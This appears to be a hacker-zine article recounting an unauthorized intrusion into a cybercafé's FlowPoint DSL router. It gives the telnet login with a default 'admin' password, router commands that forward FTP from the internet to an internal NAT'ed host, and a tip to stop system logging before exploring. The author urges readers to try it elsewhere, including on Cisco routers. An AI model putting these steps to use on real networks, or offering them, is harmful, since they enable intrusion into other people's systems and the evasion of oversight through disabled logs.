Defeating Network Address Translation

by g00gleminer  (g00gleminer@fiberia.com)

I was sitting in a cybercafé recently, day-dreaming how nice it would be to remotely access these shiny Linux boxen in front of me to hop around the net anonymously.

I gave it a shot.  No shell access - someone clueful set up these hosts.  I tried to shoulder surf the password out of the bored (but helpful) café worker.  My eyes were too slow.  D'oh!

I tried to browse / via the browser - no luck.  The front door was impervious.

But I asked myself if someone had set up the "back door" with the same attention to detail.  I surfed to whatismyipaddress.com and got the IP address.  I made a note of it on my PDA.

Back in the lab, I poked around.  The IP addy turned out to be a DSL router doing Network Address Translation (NAT) for the café's machines.

This is a pretty common setup, since it's cheap and secure - if it's set up correctly.  Emphasis on the last part of the sentence.

$ telnet 63.228.xxx.xxx Trying 63.228.xxx.xxx... Connected to 63.228.xxx.xxx. Escape character is '^]'. FlowPoint/2200 SDSL [ATM] Router fp2200-32 v3.5.1 Ready Login:

Lessee, could that be on a default password list?

I surfed to www.phenoelit.de/dpl/dpl.html (this site is threatened by the DMCA, incidentally) and saw the default immediately: admin (sad, but true).

Login: admin Logged in successfully!

Now what?

I had to figure out a way to do some port redirection so that the FlowPoint would forward specific service traffic to the same port on internal, NAT'ed hosts.  After some Google (ab)usage, I did:

# dhcp list

and saw the IP pool of reserved, non-routeable addresses handed out to the café clients upon issuing a DHCP request.

I chose one of the IPs and issued the command which would do the port forwarding from the FlowPoint to this particular internal IP address and port.  I chose FTP since it comes enabled on many Linux distros.

# rem addServer 192.168.254.19 tcp ftp wan # exit

Now I tried to connect to the masqueraded host:

$ ftp 63.228.xxx.xxx Connected to some.cybercafe.host 220 some.cybercafe.host FTP server ready, Name (some.cybercafe.host:g00gle):

Woohoo!  It worked.

From here, I could do any number of things which I will leave to your imagination.  Note that in getting to this point, I did not change the FlowPoint admin password, muck with DHCP leases, or generally cause unwarranted chaos.

I also took the time to restore the service to its previous unforwarded state when I was finished:

# rem delServer 192.168.254.19 tcp ftp wan

If you try this for yourself, remember not to choose Telnet as the forwarded service, or you will lose communication with the router on subsequent connects.  It would also be wise to temporarily turn logging off prior to exploration of the FlowPoint OS:

# system log stop

Although this example worked for a cybercafé setting, you will encounter similar setups elsewhere since many people:

• Trust NAT blindly.
• Are too lazy to change default passwords.

It should be easy to do this for Cisco DSL routers as well.